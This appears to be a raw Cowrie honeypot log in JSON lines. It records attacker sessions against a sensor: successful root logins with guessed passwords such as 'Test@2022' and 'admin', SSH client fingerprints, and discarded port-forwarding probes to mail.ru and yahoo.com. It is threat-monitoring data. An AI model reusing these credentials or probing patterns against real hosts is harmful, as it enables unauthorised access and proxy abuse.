{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:40.081985Z","src_ip":"77.83.207.83","session":"d53fee7c0232"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":2267,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:2267","sensor":"my-vps","timestamp":"2025-08-31T03:51:40.133212Z","session":"d53fee7c0232"}
{"eventid":"cowrie.session.closed","duration":13.049774646759033,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:40.147124Z","src_ip":"212.227.235.229","session":"6aeee8366c08"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:40.183680Z","src_ip":"77.83.207.83","session":"d53fee7c0232"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":17596,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:17596","sensor":"my-vps","timestamp":"2025-08-31T03:51:40.324640Z","session":"d53fee7c0232"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58220,"dst_ip":"1.2.3.4","dst_port":23,"session":"ccaaa1113d97","protocol":"telnet","message":"New connection: 212.227.235.229:58220 (1.2.3.4:23) [session: ccaaa1113d97]","sensor":"my-vps","timestamp":"2025-08-31T03:51:40.361656Z"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:40.375030Z","src_ip":"77.83.207.83","session":"d53fee7c0232"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44810,"dst_ip":"1.2.3.4","dst_port":22,"session":"86eacc4d7083","protocol":"ssh","message":"New connection: 212.227.125.160:44810 (1.2.3.4:22) [session: 86eacc4d7083]","sensor":"my-vps","timestamp":"2025-08-31T03:51:40.438972Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":2723,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:2723","sensor":"my-vps","timestamp":"2025-08-31T03:51:40.516811Z","session":"d53fee7c0232"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:40.567242Z","src_ip":"77.83.207.83","session":"d53fee7c0232"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:40.618558Z","src_ip":"77.83.207.83","session":"d53fee7c0232"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":25550,"dst_ip":"1.2.3.4","dst_port":22,"session":"3aaafc9468fd","protocol":"ssh","message":"New connection: 77.83.207.83:25550 (1.2.3.4:22) [session: 3aaafc9468fd]","sensor":"my-vps","timestamp":"2025-08-31T03:51:40.669123Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:40.679319Z","src_ip":"77.83.207.83","session":"3aaafc9468fd"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:40.720531Z","src_ip":"77.83.207.83","session":"3aaafc9468fd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:40.974623Z","src_ip":"77.83.207.83","session":"3aaafc9468fd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":26459,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:26459","sensor":"my-vps","timestamp":"2025-08-31T03:51:41.026489Z","session":"3aaafc9468fd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:41.077522Z","src_ip":"77.83.207.83","session":"3aaafc9468fd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":22199,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:22199","sensor":"my-vps","timestamp":"2025-08-31T03:51:41.221209Z","session":"3aaafc9468fd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:41.272134Z","src_ip":"77.83.207.83","session":"3aaafc9468fd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":8567,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:8567","sensor":"my-vps","timestamp":"2025-08-31T03:51:41.417279Z","session":"3aaafc9468fd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:41.468165Z","src_ip":"77.83.207.83","session":"3aaafc9468fd"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:41.520160Z","src_ip":"77.83.207.83","session":"3aaafc9468fd"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":25652,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0e495a7514a","protocol":"ssh","message":"New connection: 77.83.207.83:25652 (1.2.3.4:22) [session: c0e495a7514a]","sensor":"my-vps","timestamp":"2025-08-31T03:51:41.569553Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:41.570331Z","src_ip":"77.83.207.83","session":"c0e495a7514a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:41.620998Z","src_ip":"77.83.207.83","session":"c0e495a7514a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:41.871078Z","src_ip":"77.83.207.83","session":"c0e495a7514a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":22349,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:22349","sensor":"my-vps","timestamp":"2025-08-31T03:51:41.922546Z","session":"c0e495a7514a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:41.973985Z","src_ip":"77.83.207.83","session":"c0e495a7514a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":11785,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:11785","sensor":"my-vps","timestamp":"2025-08-31T03:51:42.116557Z","session":"c0e495a7514a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:42.166842Z","src_ip":"77.83.207.83","session":"c0e495a7514a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":5948,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:5948","sensor":"my-vps","timestamp":"2025-08-31T03:51:42.308432Z","session":"c0e495a7514a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:42.358551Z","src_ip":"77.83.207.83","session":"c0e495a7514a"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:42.409714Z","src_ip":"77.83.207.83","session":"c0e495a7514a"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":25780,"dst_ip":"1.2.3.4","dst_port":22,"session":"43d5c0d730cc","protocol":"ssh","message":"New connection: 77.83.207.83:25780 (1.2.3.4:22) [session: 43d5c0d730cc]","sensor":"my-vps","timestamp":"2025-08-31T03:51:42.459745Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:42.460774Z","src_ip":"77.83.207.83","session":"43d5c0d730cc"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:42.512346Z","src_ip":"77.83.207.83","session":"43d5c0d730cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36914,"dst_ip":"1.2.3.4","dst_port":22,"session":"e40c521502d9","protocol":"ssh","message":"New connection: 212.227.235.229:36914 (1.2.3.4:22) [session: e40c521502d9]","sensor":"my-vps","timestamp":"2025-08-31T03:51:42.737366Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:42.767365Z","src_ip":"77.83.207.83","session":"43d5c0d730cc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":10190,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:10190","sensor":"my-vps","timestamp":"2025-08-31T03:51:42.819824Z","session":"43d5c0d730cc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:42.871550Z","src_ip":"77.83.207.83","session":"43d5c0d730cc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":2390,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:2390","sensor":"my-vps","timestamp":"2025-08-31T03:51:43.017845Z","session":"43d5c0d730cc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:43.070862Z","src_ip":"77.83.207.83","session":"43d5c0d730cc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":11072,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:11072","sensor":"my-vps","timestamp":"2025-08-31T03:51:43.213394Z","session":"43d5c0d730cc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:43.264433Z","src_ip":"77.83.207.83","session":"43d5c0d730cc"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:43.316007Z","src_ip":"77.83.207.83","session":"43d5c0d730cc"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":25905,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a7ca0806217","protocol":"ssh","message":"New connection: 77.83.207.83:25905 (1.2.3.4:22) [session: 1a7ca0806217]","sensor":"my-vps","timestamp":"2025-08-31T03:51:43.365149Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:43.365897Z","src_ip":"77.83.207.83","session":"1a7ca0806217"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:43.416589Z","src_ip":"77.83.207.83","session":"1a7ca0806217"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:43.669201Z","src_ip":"77.83.207.83","session":"1a7ca0806217"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":23033,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:23033","sensor":"my-vps","timestamp":"2025-08-31T03:51:43.720538Z","session":"1a7ca0806217"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45026,"dst_ip":"1.2.3.4","dst_port":23,"session":"5eaa601b498c","protocol":"telnet","message":"New connection: 212.227.125.160:45026 (1.2.3.4:23) [session: 5eaa601b498c]","sensor":"my-vps","timestamp":"2025-08-31T03:51:43.766739Z"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:43.771262Z","src_ip":"77.83.207.83","session":"1a7ca0806217"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:51:43.778462Z","src_ip":"212.227.235.229","session":"e40c521502d9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:51:43.779185Z","src_ip":"212.227.235.229","session":"e40c521502d9"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:43.849784Z","src_ip":"212.227.125.160","session":"5eaa601b498c"}
